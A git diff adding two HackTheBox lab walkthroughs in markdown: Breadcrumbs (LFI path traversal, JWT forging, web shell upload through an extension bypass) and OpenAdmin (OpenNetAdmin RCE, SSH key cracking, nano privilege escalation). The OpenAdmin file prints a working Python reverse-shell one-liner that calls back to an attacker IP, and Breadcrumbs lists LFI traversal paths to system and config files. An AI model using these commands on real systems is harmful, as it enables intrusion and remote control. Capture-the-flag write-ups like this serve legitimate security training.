diff --git a/HackTheBox/Breadcrumbs.md b/HackTheBox/Breadcrumbs.md
new file mode 100644
index 0000000..e621a64
--- /dev/null
+++ b/HackTheBox/Breadcrumbs.md
@@ -0,0 +1,309 @@
+# HackTheBox-Breadcrumbs
+
+## Rustscan
+
+```bash
+
+PORT STATE SERVICE REASON VERSION
+22/tcp open ssh syn-ack ttl 127 OpenSSH for_Windows_7.7 (protocol 2.0)
+| ssh-hostkey:
+| 2048 9d:d0:b8:81:55:54:ea:0f:89:b1:10:32:33:6a:a7:8f (RSA)
+| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD1/bmEHFv3nRSf2uH/akLLIfkmpxbSWiVReOdwmJrM2iD9g1gqVHIceIxat222PnYkLHYG23lUQMiTXcvuwBHeB+dMUNv09IHDKCCT9XOTWc
++900zrFLRoyR6LQ2O3vQ+JgWpWlvtZAV6FvcSSK3ai767qIdBNG8SAxwwQZlSxX7D/n28VJlPcXXtzoiSt+lQ1T1sq7qIXPM2CyY7qoTLjcvDz/IYqbXbinsLLOCZ9MnRnDbE8E9tLeAJGcxhpNg
+k0LNN6xGbj49zVhy1TRrVNhh4RD+uczVqufMQIHdCnL61p9ZIepQxhJvwSf4IHH+oaM6wy3Yu0W6pg5wQWXIkj
+| 256 1f:2e:67:37:1a:b8:91:1d:5c:31:59:c7:c6:df:14:1d (ECDSA)
+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMPvEspRGrd2/vma82j25vli6C/Td5Gvl44e9IhXeZOlvojawx4tbo/OdBytc+X9b/OSP01kLK
+4Od62NrQmN39s=
+| 256 30:9e:5d:12:e3:c6:b7:c6:3b:7e:1e:e7:89:7e:83:e4 (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAII+TY3313X2GdjXH6r6IrDURWI4H4itbZG41GaktT00D
+80/tcp open http syn-ack ttl 127 Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
+135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
+139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
+443/tcp open ssl/http syn-ack ttl 127 Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
+| ssl-cert: Subject: commonName=localhost
+| Issuer: commonName=localhost
+| Public Key type: rsa
+| Public Key bits: 1024
+| Signature Algorithm: sha1WithRSAEncryption
+| Not valid before: 2009-11-10T23:48:47
+| Not valid after: 2019-11-08T23:48:47
+| MD5: a0a4 4cc9 9e84 b26f 9e63 9f9e d229 dee0
+| SHA-1: b023 8c54 7a90 5bfa 119c 4e8b acca eacf 3649 1ff6
+| -----BEGIN CERTIFICATE-----
+445/tcp open microsoft-ds? syn-ack ttl 127
+3306/tcp open mysql? syn-ack ttl 127
+| fingerprint-strings:
+| NULL, SIPOptions:
+|_ Host '10.10.14.196' is not allowed to connect to this MariaDB server
+5040/tcp open unknown syn-ack ttl 127
+7680/tcp open pando-pub? syn-ack ttl 127
+49664/tcp open unknown syn-ack ttl 127
+49665/tcp open unknown syn-ack ttl 127
+49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
+49667/tcp open unknown syn-ack ttl 127
+49668/tcp open unknown syn-ack ttl 127
+49669/tcp open unknown syn-ack ttl 127
+
+```
+
+## PORT 145/445 (SMB)
+
+I tried to anonymously connect to smb but couldn't
+
+
+
+
+## PORT 80
+
+
+
+We can see a button `Check Books` it will take us to `book.php`
+
+
+
+Now here I didn't know any books so I just started with letter `A` so it returned a bunch of books
+
+
+
+
+
+Viewing these dialog boxes doen't really help us so I intercepted the request with `Brup Suite`
+
+
+
+Here we can see a paramter `book` which is taking a filename so there's a chance that LFI (Local File Inclusion) exists here so to test it for `index.php`
+
+
+
+It throws an error as index.php is not in `/books` directory so we need to go parent directory where index.php is using `../`
+
+
+
+So it does work we can see the source code of `index.php` now since this is a windows machine we can try to view the hosts file
+
+`../../../../../../WINDOWS/system32/drivers/etc/hosts`
+
+
+
+We saw previously from erros regarding `bookController.php` so let's try to read the file
+
+`../../../../../../Users/www-data/Desktop/xampp/htdocs/includes/bookController.php`
+
+
+
+On reading we can `db.php` so maybe there must be some credentials we can find
+
+`../../../../../../Users/www-data/Desktop/xampp/htdocs/db/db.php`
+
+
+
+Although the port is open to use (3306) but still we are not allowed to connect to mysql service
+
+
+
+I tried to read the apache error log and was sucessful in reading so we can do Log poisining to get RCE
+
+`../../../../../../Users/www-data/Desktop/xampp/apache/logs/error.log`
+
+
+
+
+So in `User-Agent` we will add a php GET parameter
+
+
+
+`User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0`
+
+Tried doing this but couldn't get LFI to RCE so went step back to do fuzzing with `dirsearch`
+
+
+
+Found a directory named portal `portal`
+
+
+
+We can try to signup an account on the site
+
+
+
+After going through all the site I read the `login.php` page I found it was using `authController.php` page
+
+
+
+
+
+
+We can see that there's a JWT token involved also there's a php file `cookie.php` and we can see the salt being used in there to generate `PHPSESSID`
+
+
+
+Also we can see in `files.php` that username should be "paul"
+
+
+
+So going to JWT.io to create a token for `paul`
+
+
+
+Then generating PHPSESSION
+
+
+
+
+
+Here I ran the file in loop because of the random number it's going to take in generating the cookie so that cookie worked when I replaced it with the current cookie
+
+
+
+After hitting refresh the user got changed and we logged in as `paul`
+
+
+
+Going to `File Management` we can upload files but there's a restriction that only zip files are allowed
+
+
+
+Testing for uploading a zip file
+
+
+
+On uploading it gives us an error
+
+
+
+So Intercepting the request we can see that there's a `.zip` extension that will added to a file name we can by pass it by adding a .php extension
+
+
+
+So I downloaded a php script from https://github.com/flozz/p0wny-shell, copied contents of the `shell.php` file then pasted the contents along with adding `.php` file extension
+
+
+
+
+
+
+
+Host `ncat64.exe` on your local machine
+
+
+
+And download it on the target machine
+
+
+
+
+
+
+
+We can see a folder `pizzaDeliveryUserData`
+
+
+
+There's a user `juliette`
+
+
+
+So going back to that directory we can see the json file for the user and can find credentials in there
+
+
+
+
+
+There's ssh port open on the machine we can try to login through ssh using these credentials
+
+
+
+
+
+Looking at the contents of `todo.html`
+
+
+
+
+
+As the html file says about `Stick Notes` let's see if we can find where Windows saves sticky notes so going to this link I was able to find where the notes were stored
+
+https://www.thewindowsclub.com/where-are-sticky-notes-saved-in-windows-10
+
+
+
+
+
+Now to save this on our machine we need to transfer it by creating a smb share on our local machine and making sure it has both read and write permissions so doing `nano /etc/samba/smb.conf`
+
+
+
+
+
+Start the service and transfer the file using `copy filename \\ip\share`
+
+
+
+
+
+ Make sure to copy all plum files and unfortunately you will need to transfer these files to Windows and copy them in the same location where you found these files on the target machine
+
+ 
+
+ Now just launch `Sticky Notes` application on Windows
+
+ 
+
+ Now that we got the password for another use `development` we can access his folder and see what's in there
+
+ 
+
+ 
+
+ Here we see a binary called `Krypter_Linux` so again copy that file to local machine's smb share
+
+ 
+
+ 
+
+
+ Running `strings` command on binary we can see a domain name on port 1234
+
+ 
+
+Let's further analyze the binary with `Ghidra`
+
+
+
+We can see that it's in the form of a GET parameters so we can send a request to that port with this data but before we do that let's do port forwarding for port 1234
+
+ So doing dynamic port forwarding through ssh
+
+ 
+
+Now let's make the request to that port
+
+
+
+We get an aes key but don't get a password so we can try to sql injection on the parameters by using `sqlmap`
+
+
+
+
+
+Now we have the encrpyted text and then aes key so we need to decrypt it , I visited this online tool
+
+https://www.devglan.com/online-tools/aes-encryption-decryption
+
+
+
+
+
+Now we just need to decode it from base64
+
+
+
+
+
+And that's it we got administrator on the machine
+
+# Things Learned
+
+1. If you got LFI always look around in the source code you will find how the application works
+2. If you find a binary make sure to analyze what's in there
+3. We can transfer files from windows to linux by running smb service on linux machine
\ No newline at end of file
diff --git a/HackTheBox/OpenAdmin.md b/HackTheBox/OpenAdmin.md
new file mode 100644
index 0000000..72329d7
--- /dev/null
+++ b/HackTheBox/OpenAdmin.md
@@ -0,0 +1,165 @@
+# HackTheBox-OpenAdmin
+
+## NMAP
+
+```bash
+nmap -p- -sC -sV --min-rate 5000 IP
+
+PORT STATE SERVICE REASON VERSION
+22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
+| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcVHOWV8MC41kgTdwiBIBmUrM8vGHUM2Q7+a0LCl9jfH3bIpmuWnzwev97wpc8pRHPuKfKm0c3iHGII+cKSsVgzVtJfQdQ0j/GyDcBQ9s1VG
+HiYIjbpX30eM2P2N5g2hy9ZWsF36WMoo5Fr+mPNycf6Mf0QOODMVqbmE3VVZE1VlX3pNW4ZkMIpDSUR89JhH+PHz/miZ1OhBdSoNWYJIuWyn8DWLCGBQ7THxxYOfN1bwhfYRCRTv46tiayuF2NNK
+WaDqDq/DXZxSYjwpSVelFV+vybL6nU0f28PzpQsmvPab4PtMUb0epaj4ZFcB1VVITVCdBsiu4SpZDdElxkuQJz
+| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHqbD5jGewKxd8heN452cfS5LS/VdUroTScThdV8IiZdTxgSaXN1Qga4audhlYIGSyDdTEL8x2
+tPAFPpvipRrLE=
+| 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBcV0sVI0yWfjKsl7++B9FGfOVeWAIWZ4YGEMROPxxk4
+80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
+| http-methods:
+|_ Supported Methods: POST OPTIONS HEAD GET
+|_http-server-header: Apache/2.4.29 (Ubuntu)
+|_http-title: Apache2 Ubuntu Default Page: It works
+
+```
+
+## PORT 80 (HTTP)
+
+On the web server we only get apache default web page
+
+
+
+I tried to see if it had something in `robots.txt` but that file didn't existed
+
+
+
+So I decide to run `gobuster` to fuzz for files and directories
+
+
+
+Going to `music` we can see a html template page , there's login link which takes us to `OpenNetAdmin` page which is an application for managing IP addresses DNS , subnets and etc also it exposes the version of openetadmmin which is 18.1.1
+
+
+
+On googling for any exploits which are there for version `18.1.1` we can see a github repo having the PoC of remote code execution
+
+https://github.com/amriunix/ona-rce
+
+
+
+We can check through poc if the target is vulnerable or not
+
+
+
+But when running the exploit it breaks
+
+
+
+So I went to `exploit-db` and try that exploit
+
+
+
+And this one worked perfectly
+
+
+
+I tried getting a reverse shell again so that I can stabilize it but it wasn't working
+
+
+
+I made a simple php file having a GET parameter named `cmd` which will be executed through `system` function which is used to execute shell commands and outputs the result , then I hosted this file using `python3` and downloaded it on target machine using `wget`
+
+
+
+Using python3 reverse shell I was able to get a proper shell
+
+```bash
+python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.84",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
+```
+
+
+
+Here I have just tried to stabilize the shell so we can have the ability to clear terminal screen also use bash history by using up and arrow down keys
+
+
+
+We can go into `/home` directory to see how many users are there
+
+
+
+There are 2 users but we can't navigate into to folders as `www-data` doesn't have permissions to view them. We can look for any cronjobs running through `cat /etc/crontab`
+
+
+
+Nothing there, next we can look for open ports
+
+
+
+Here we can see port 3306 which is for database , we can try to view the database password and see if it works on either one of the users
+
+
+
+In `/opt/ona/www/local/config` we can see a database settings file
+
+
+
+Let's try this password on `jimmy`
+
+
+
+Perfect this worked !
+
+
+
+But doing `sudo -l` failed the user was not allowed to use `sudo` I guess , so this user is in `internal` group maybe there's some folder we can look into
+
+
+So looking into `index.php` we can see it's a login page which requires username and password and there's a condition if we provide the username as `jimmy` or provide the correct password which we could just decrpyt the sha512 hash , on decrypting it is `Revealed`
+
+
+
+
+
+We can also see a php file `main.php` which is executing a shell command to read id_rsa key of `joanna` , if we try to run the php file we will get permission denied error as it's going to be executed as `jimmy`
+
+
+
+
+
+If we look at the running ports on the machine we can see a port `52846`
+
+
+
+Using `curl` we can make a request on that port and it seems this is the same page that we saw in `internal` directory so this directory is being hosted on port 52846 this means we can naviagte to `main.php` file
+
+
+
+
+
+I saved the request to `main.php` in a text file and transfered that file on my machine
+
+
+
+On using the private key , it asks for a passphrase
+
+
+
+Using `ssh2john` we can get the hash of id_rsa and crack it so we can get the passphrase
+
+
+
+
+
+Now we have escalated to the second user , on running `sudo -l` we can see have permissions to run `nano` on `/opt/priv`
+
+
+
+We can check the how to abuse `nano` from GTFOBINS
+
+https://gtfobins.github.io/gtfobins/nano/
+
+
+
+